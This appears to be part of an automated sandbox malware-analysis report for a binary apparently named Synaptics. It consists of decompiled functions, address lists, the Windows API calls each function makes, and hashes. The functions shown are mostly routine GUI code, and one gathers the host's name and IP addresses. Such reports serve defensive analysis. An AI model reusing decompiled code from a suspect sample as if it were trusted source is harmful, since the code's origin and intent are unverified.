                                                                                                                                                                                          0x0045a3e9
                                                                                                                                                                                          0x0045a3de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a3de
                                                                                                                                                                                          0x0045a3f1
                                                                                                                                                                                          0x0045a3f3
                                                                                                                                                                                          0x0045a3f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a3cf
                                                                                                                                                                                          0x0045a3d4
                                                                                                                                                                                          0x0045a3f5
                                                                                                                                                                                          0x0045a40e
                                                                                                                                                                                          0x0045a410
                                                                                                                                                                                          0x0045a410
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a40e
                                                                                                                                                                                          0x0045a3c5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCapture.USER32 ref: 0045A3B3
                                                                                                                                                                                          • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 0045A417
                                                                                                                                                                                          • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CaptureLongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1158686931-0
                                                                                                                                                                                          • Opcode ID: f12de09e93a5b015bcf77922c91d4743cfc05ccfc7e81301400765280e2ab61c
                                                                                                                                                                                          • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                                                                                                                                                          • Opcode Fuzzy Hash: f12de09e93a5b015bcf77922c91d4743cfc05ccfc7e81301400765280e2ab61c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00442F0C Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 22%
                                                                                                                                                                                          			E00442F0C(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x49d970; // 0x49e900
					_t17 =  *0x49d970; // 0x49e900
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L0042C408();
					_v8 = _t19;
					_push(_t49);
					_push(0x442fcc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042C48C();
					_push( &_v16);
					_push(0);
					L0042C49C();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042C48C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x442fd3);
					_t37 = _v8;
					_push(_t37);
					L0042C410();
					return _t37;
				}
			}

















                                                                                                                                                                                          0x00442f0d
                                                                                                                                                                                          0x00442f0f
                                                                                                                                                                                          0x00442f13
                                                                                                                                                                                          0x00442f1a
                                                                                                                                                                                          0x00442fd7
                                                                                                                                                                                          0x00442f20
                                                                                                                                                                                          0x00442f28
                                                                                                                                                                                          0x00442f34
                                                                                                                                                                                          0x00442f3b
                                                                                                                                                                                          0x00442f3d
                                                                                                                                                                                          0x00442f3e
                                                                                                                                                                                          0x00442f43
                                                                                                                                                                                          0x00442f48
                                                                                                                                                                                          0x00442f49
                                                                                                                                                                                          0x00442f4e
                                                                                                                                                                                          0x00442f51
                                                                                                                                                                                          0x00442f58
                                                                                                                                                                                          0x00442f69
                                                                                                                                                                                          0x00442f72
                                                                                                                                                                                          0x00442f83
                                                                                                                                                                                          0x00442f88
                                                                                                                                                                                          0x00442f8a
                                                                                                                                                                                          0x00442f8c
                                                                                                                                                                                          0x00442f91
                                                                                                                                                                                          0x00442f92
                                                                                                                                                                                          0x00442f9a
                                                                                                                                                                                          0x00442f9b
                                                                                                                                                                                          0x00442f9d
                                                                                                                                                                                          0x00442fa5
                                                                                                                                                                                          0x00442fa9
                                                                                                                                                                                          0x00442faa
                                                                                                                                                                                          0x00442faf
                                                                                                                                                                                          0x00442fb0
                                                                                                                                                                                          0x00442fb7
                                                                                                                                                                                          0x00442fba
                                                                                                                                                                                          0x00442fbd
                                                                                                                                                                                          0x00442fc2
                                                                                                                                                                                          0x00442fc5
                                                                                                                                                                                          0x00442fc6
                                                                                                                                                                                          0x00442fcb
                                                                                                                                                                                          0x00442fcb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73751AB0.COMCTL32(00000000), ref: 00442F3E
                                                                                                                                                                                            • Part of subcall function 0042C440: 73752140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                                                                                                                                                          • 73751680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                                                                                                                                                          • 73751710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                                                                                                                                                          • 73751680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                                                                                                                                                          • 73751F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: 7375173751680$7375171073752140
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3191654781-0
                                                                                                                                                                                          • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                          • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00472C58 Relevance: 7.6, APIs: 5, Instructions: 67networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v408;
				char _v412;
				char _v416;
				int _t30;
				char* _t38;
				signed int _t39;
				intOrPtr _t48;
				intOrPtr* _t53;
				intOrPtr _t55;
				void* _t56;
				void* _t58;

				_v416 = 0;
				_v412 = 0;
				 *[fs:eax] = _t58 + 0xfffffe64;
				_t38 = E00408D24(0x104, __eflags);
				L00472BD0();
				_v8 = E00403BBC(1);
				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
				E00404BB8( &_v412, _t38);
				_t30 = gethostname(_t38, E00404C80(_v412));
				_push(_t38);
				L00472BC0();
				if(_t30 != 0) {
					_t55 =  *((intOrPtr*)(_t30 + 0xc));
					_t39 = 0;
					while(1) {
						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
						if(_t53 == 0) {
							break;
						}
						L00472BB8();
						E00404BB8( &_v416, _t30);
						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
						_t39 = _t39 + 1;
						__eflags = _t39;
					}
					L00472BD8();
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x472d38);
				return E004049E4( &_v416, 2);
			}















                                                                                                                                                                                          0x00472c66
                                                                                                                                                                                          0x00472c6c
                                                                                                                                                                                          0x00472c7d
                                                                                                                                                                                          0x00472c8a
                                                                                                                                                                                          0x00472c98
                                                                                                                                                                                          0x00472ca9
                                                                                                                                                                                          0x00472cb1
                                                                                                                                                                                          0x00472cbc
                                                                                                                                                                                          0x00472cce
                                                                                                                                                                                          0x00472cd3
                                                                                                                                                                                          0x00472cd4
                                                                                                                                                                                          0x00472cdb
                                                                                                                                                                                          0x00472cdd
                                                                                                                                                                                          0x00472ce0
                                                                                                                                                                                          0x00472d07
                                                                                                                                                                                          0x00472d07
                                                                                                                                                                                          0x00472d0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00472ce6
                                                                                                                                                                                          0x00472cf3
                                                                                                                                                                                          0x00472d03
                                                                                                                                                                                          0x00472d06
                                                                                                                                                                                          0x00472d06
                                                                                                                                                                                          0x00472d06
                                                                                                                                                                                          0x00472d0e
                                                                                                                                                                                          0x00472d0e
                                                                                                                                                                                          0x00472d15
                                                                                                                                                                                          0x00472d18
                                                                                                                                                                                          0x00472d1b
                                                                                                                                                                                          0x00472d30

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                                                                                                                                                          • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                                                                                                                                                          • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                                                                                                                                                          • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                                                                                                                                                          • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 348263315-0
                                                                                                                                                                                          • Opcode ID: 2597941c910caa3ba4572272bd3ca43fbff399438b71026350468ce82a15d9f1
                                                                                                                                                                                          • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2597941c910caa3ba4572272bd3ca43fbff399438b71026350468ce82a15d9f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042A288 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E0042A288(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00428BFC(_t22);
					}
					_t21 = E00426750( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00407638();
						_t21 = E00426060(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00407380();
							_push(0xe);
							_push(_t38);
							L00407380();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407888();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                                                                                                                                                          0x0042a288
                                                                                                                                                                                          0x0042a28c
                                                                                                                                                                                          0x0042a28e
                                                                                                                                                                                          0x0042a295
                                                                                                                                                                                          0x0042a2af
                                                                                                                                                                                          0x0042a2b5
                                                                                                                                                                                          0x0042a2b7
                                                                                                                                                                                          0x0042a2b7
                                                                                                                                                                                          0x0042a2ce
                                                                                                                                                                                          0x0042a2d3
                                                                                                                                                                                          0x0042a2d5
                                                                                                                                                                                          0x0042a2da
                                                                                                                                                                                          0x0042a2dc
                                                                                                                                                                                          0x0042a2de
                                                                                                                                                                                          0x0042a2e3
                                                                                                                                                                                          0x0042a2e8
                                                                                                                                                                                          0x0042a2ee
                                                                                                                                                                                          0x0042a317
                                                                                                                                                                                          0x0042a317
                                                                                                                                                                                          0x0042a2f0
                                                                                                                                                                                          0x0042a2f0
                                                                                                                                                                                          0x0042a2f2
                                                                                                                                                                                          0x0042a2f3
                                                                                                                                                                                          0x0042a2fa
                                                                                                                                                                                          0x0042a2fc
                                                                                                                                                                                          0x0042a2fd
                                                                                                                                                                                          0x0042a302
                                                                                                                                                                                          0x0042a30d
                                                                                                                                                                                          0x0042a311
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042a313
                                                                                                                                                                                          0x0042a313
                                                                                                                                                                                          0x0042a313
                                                                                                                                                                                          0x0042a311
                                                                                                                                                                                          0x0042a319
                                                                                                                                                                                          0x0042a31e
                                                                                                                                                                                          0x0042a321
                                                                                                                                                                                          0x0042a326
                                                                                                                                                                                          0x0042a326
                                                                                                                                                                                          0x0042a329
                                                                                                                                                                                          0x0042a32a
                                                                                                                                                                                          0x0042a32c
                                                                                                                                                                                          0x0042a335
                                                                                                                                                                                          0x0042a337
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042a337
                                                                                                                                                                                          0x0042a335
                                                                                                                                                                                          0x0042a2da
                                                                                                                                                                                          0x0042a33f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                          • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B380CreateHalftonePalette
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 178651289-0
                                                                                                                                                                                          • Opcode ID: c8d4c93cc583ed9d9441793febc9cc7f1891d12bd8e01e95aafc8bbdf1e36651
                                                                                                                                                                                          • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8d4c93cc583ed9d9441793febc9cc7f1891d12bd8e01e95aafc8bbdf1e36651
                                                                                                                                                                                          • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00457988 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                          			E00457988(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x49be68 != 0) {
					_t16 = E00441A08(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E00441704(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E00441704(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x49be68(E00441704(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0049BEEC |  *0x0049BEF4);
						} else {
							SetWindowLongA(E00441704(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E00441704(_t38);
							_push(_t37);
							L00407860();
							return _t37;
						}
					}
				}
				return _t16;
			}







                                                                                                                                                                                          0x00457988
                                                                                                                                                                                          0x0045798a
                                                                                                                                                                                          0x00457990
                                                                                                                                                                                          0x004579a5
                                                                                                                                                                                          0x004579ac
                                                                                                                                                                                          0x004579c1
                                                                                                                                                                                          0x004579ca
                                                                                                                                                                                          0x004579db
                                                                                                                                                                                          0x004579ee
                                                                                                                                                                                          0x004579ee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00457a30
                                                                                                                                                                                          0x00457a41
                                                                                                                                                                                          0x00457a46
                                                                                                                                                                                          0x00457a4b
                                                                                                                                                                                          0x00457a4d
                                                                                                                                                                                          0x00457a51
                                                                                                                                                                                          0x00457a56
                                                                                                                                                                                          0x00457a57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00457a57
                                                                                                                                                                                          0x004579ca
                                                                                                                                                                                          0x004579ac
                                                                                                                                                                                          0x00457a5e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 004579BC
                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 004579EE
                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045557C), ref: 00457A28
                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00457A41
                                                                                                                                                                                          • 73CCB330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045557C), ref: 00457A57
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Long$AttributesB330Layered
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1770052509-0
                                                                                                                                                                                          • Opcode ID: 7ade270508231717ce0c7eeda558c4dcfd1cac8646c36d69f970ba05a401db38
                                                                                                                                                                                          • Instruction ID: c75218e602284ca66c221aec59f9fe954b3d3a500fdcd06e0ec5254f6f3a142b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ade270508231717ce0c7eeda558c4dcfd1cac8646c36d69f970ba05a401db38
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4411EB51A4829065EF10AE799CC9BCE1A8C5B05329F04157BBD45EB2E3CA7C8C48C36C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004266B8 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                          			E004266B8(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x49e894 == 0) {
					return _v5;
				} else {
					_push(0);
					L00407638();
					_v12 = __eax;
					_push(_t32);
					_push(0x42673e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00407380();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x49e894; // 0x790806c5
						_push(_t18);
						L004073A8();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x49e894; // 0x790806c5
						_push(_t21);
						L004073A8();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x426745);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407888();
					return _t16;
				}
			}













                                                                                                                                                                                          0x004266b9
                                                                                                                                                                                          0x004266bb
                                                                                                                                                                                          0x004266c1
                                                                                                                                                                                          0x004266cc
                                                                                                                                                                                          0x0042674c
                                                                                                                                                                                          0x004266ce
                                                                                                                                                                                          0x004266ce
                                                                                                                                                                                          0x004266d0
                                                                                                                                                                                          0x004266d5
                                                                                                                                                                                          0x004266da
                                                                                                                                                                                          0x004266db
                                                                                                                                                                                          0x004266e0
                                                                                                                                                                                          0x004266e3
                                                                                                                                                                                          0x004266e6
                                                                                                                                                                                          0x004266e8
                                                                                                                                                                                          0x004266eb
                                                                                                                                                                                          0x004266ec
                                                                                                                                                                                          0x004266f4
                                                                                                                                                                                          0x004266f9
                                                                                                                                                                                          0x004266fa
                                                                                                                                                                                          0x004266fc
                                                                                                                                                                                          0x004266fe
                                                                                                                                                                                          0x00426703
                                                                                                                                                                                          0x00426704
                                                                                                                                                                                          0x00426711
                                                                                                                                                                                          0x00426712
                                                                                                                                                                                          0x00426714
                                                                                                                                                                                          0x00426716
                                                                                                                                                                                          0x0042671b
                                                                                                                                                                                          0x0042671c
                                                                                                                                                                                          0x00426721
                                                                                                                                                                                          0x00426721
                                                                                                                                                                                          0x00426727
                                                                                                                                                                                          0x0042672a
                                                                                                                                                                                          0x0042672d
                                                                                                                                                                                          0x00426732
                                                                                                                                                                                          0x00426735
                                                                                                                                                                                          0x00426736
                                                                                                                                                                                          0x00426738
                                                                                                                                                                                          0x0042673d
                                                                                                                                                                                          0x0042673d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 004266D0
                                                                                                                                                                                          • 73CCAD70.GDI32(?,00000068,00000000,0042673E,?,00000000), ref: 004266EC
                                                                                                                                                                                          • 73CCAEA0.GDI32(790806C5,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 00426704
                                                                                                                                                                                          • 73CCAEA0.GDI32(790806C5,00000008,00000008,?,790806C5,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 0042671C
                                                                                                                                                                                          • 73CCB380.USER32(00000000,?,00426745,0042673E,?,00000000), ref: 00426738
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B380
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 120756276-0
                                                                                                                                                                                          • Opcode ID: 26d92e3796d48fbf02547cc90baff66c5ce55989e6466209eef713e3b3d2153e
                                                                                                                                                                                          • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 26d92e3796d48fbf02547cc90baff66c5ce55989e6466209eef713e3b3d2153e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CBEC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E0040CBEC(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40cc83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
				_t29 = E00409664(0x40cc98, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49e770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040CC8A);
				return E004049C0( &_v8);
			}










